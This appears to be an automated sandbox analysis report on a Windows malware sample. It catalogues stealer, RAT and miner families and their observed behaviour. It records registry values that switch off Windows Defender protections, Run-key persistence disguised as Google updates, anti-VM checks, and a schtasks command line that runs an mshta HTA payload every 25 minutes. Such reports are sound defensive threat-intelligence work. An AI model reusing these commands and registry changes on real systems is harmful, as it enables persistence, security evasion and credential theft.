Analysis Overview
SHA256
19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288
Threat Level: Known bad
The file 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288 was found to be: Known bad.
Malicious Activity Summary
Stealc
Detect Xworm Payload
Healer
Stealc family
xmrig
Vidar family
LiteHTTP
GCleaner
Xworm
Modifies Windows Defender DisableAntiSpyware settings
SystemBC
Vidar
Litehttp family
Xmrig family
Detects Healer, an antivirus disabler dropper
Gcleaner family
Healer family
Amadey
Xworm family
Systembc family
Detect Vidar Stealer
Amadey family
Modifies Windows Defender Real-time Protection settings
Modifies Windows Defender TamperProtection settings
Modifies Windows Defender notification settings
XMRig Miner payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Identifies Wine through registry keys
Checks BIOS information in registry
Windows security modification
Reads user/profile data of web browsers
Checks computer location settings
Executes dropped EXE
Reads user/profile data of local email clients
Loads dropped DLL
Drops startup file
.NET Reactor protector
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks installed software on the system
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Drops file in Windows directory
Browser Information Discovery
Program crash
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Checks processor information in registry
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Modifies system certificate store
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Analysis: static1
Detonation Overview
| Field | Value |
| Reported | 2025-03-05 23:34 |
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
| Field | Value |
| Submitted | 2025-03-05 23:34 |
| Reported | 2025-03-05 23:37 |
| Platform | win7-20240903-en |
| Max time kernel | 150s |
| Max time network | 156s |
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer, an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
Stealc
Stealc family
Vidar
Vidar family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\jLEaFdlg\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a2a6d35a13.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107910101\\a2a6d35a13.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a3f26c3fce.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107920101\\a3f26c3fce.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\b668242231.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107930101\\b668242231.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\e16f9098dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107940101\\e16f9098dd.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 984 set thread context of 1548 | N/A | C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe | C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe |
| PID 3044 set thread context of 1412 | N/A | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2552 set thread context of 1828 | N/A | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 3448 set thread context of 3548 | N/A | C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe |
| PID 3672 set thread context of 3728 | N/A | C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
| Process image | Command line |
| C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe | "C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f |
| C:\Windows\SysWOW64\mshta.exe | mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta |
